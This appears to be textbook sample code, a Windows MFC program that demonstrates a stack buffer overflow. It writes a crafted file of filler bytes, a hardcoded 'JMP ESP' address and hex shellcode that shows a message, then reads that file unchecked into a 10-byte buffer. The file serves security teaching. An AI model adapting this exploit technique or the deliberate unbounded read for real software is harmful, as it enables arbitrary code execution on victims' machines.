bufferoverflow.cpp

“网络安全技术实践与代码详解”实例代码

// BufferOverflow.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include "BufferOverflow.h"

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// The one and only application object

CWinApp theApp;

using namespace std;

void TestOverflow(char *buf)
{
	CFile file; 
	CFileException er; 
	if(!file.Open(_T("TestOverflow.txt"),CFile::modeRead,&er)) 
	{ 
		er.ReportError(); 
		return; 
	} 
	
	int x = file.GetLength(); 
	file.Read(buf,x);

}

int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
	int nRetCode = 0;

	// initialize MFC and print and error on failure
	if (!AfxWinInit(::GetModuleHandle(NULL), NULL, ::GetCommandLine(), 0))
	{
		// TODO: change error code to suit your needs
		cerr << _T("Fatal Error: MFC initialization failed") << endl;
		nRetCode = 1;
	}
	else
	{
		// TODO: code your application's behavior here.
		// TODO: code your application's behavior here.
		//strcpy(buffer,"aaaaaaaaaaaaaaaaaaaa");
		//0x77e2e32a //user32.dll JMP ESP 
		char buffer[20];
		char eip[] = "\x2a\xe3\xe2\x77"; 
		char sploit[] = "\x55\x51\x8b\xec\x83\xec\x54\x33\xc9\xc6\x45\xec\x53\xc6\x45\xed\x75\xc6\x45\xee" 
			"\x63\xc6\x45\xef\x63\xc6\x45\xf0\x65\xc6\x45\xf1\x73\xc6\x45\xf2\x73\x88\x4d\xf3\xc6" 
			"\x45\xf4\x57\xc6\x45\xf5\x65\xc6\x45\xf6\x20\xc6\x45\xf7\x47\xc6\x45\xf8\x6f\xc6\x45" 
			"\xf9\x74\xc6\x45\xfa\x20\xc6\x45\xfb\x49\xc6\x45\xfc\x74\xc6\x45\xfd\x21\x88\x4d\xfe" 
			"\x51\x8d\x45\xec\x50\x8d\x45\xf4\x50\x51\xc7\x45\xe8\x68\x3d\xe2\x77\xff\x55\xe8\x8b" 
			"\xe5\x59\x5d\x55\x51\x8b\xec\x83\xec\x10\x33\xc9\x51\xc7\x45\xfc\x90\xaf\x20\x10\xff" 
			"\x55\xfc\x8b\xe5\x59\x5d"; 
		
		for(int x=0;x<20;x++) 
		{ 
			buffer[x] = 0x61; 
		} 
		
		CFile file; 
		file.Open("TestOverflow.txt",CFile::modeCreate | CFile::modeWrite); 
		
		file.Write(buffer,20); 
		file.Write(eip,strlen(eip)); 
		file.Write(sploit,strlen(sploit)); 
		
		file.Close(); 
		char buf[10]; 
		TestOverflow(buf); 

	}

	return nRetCode;
}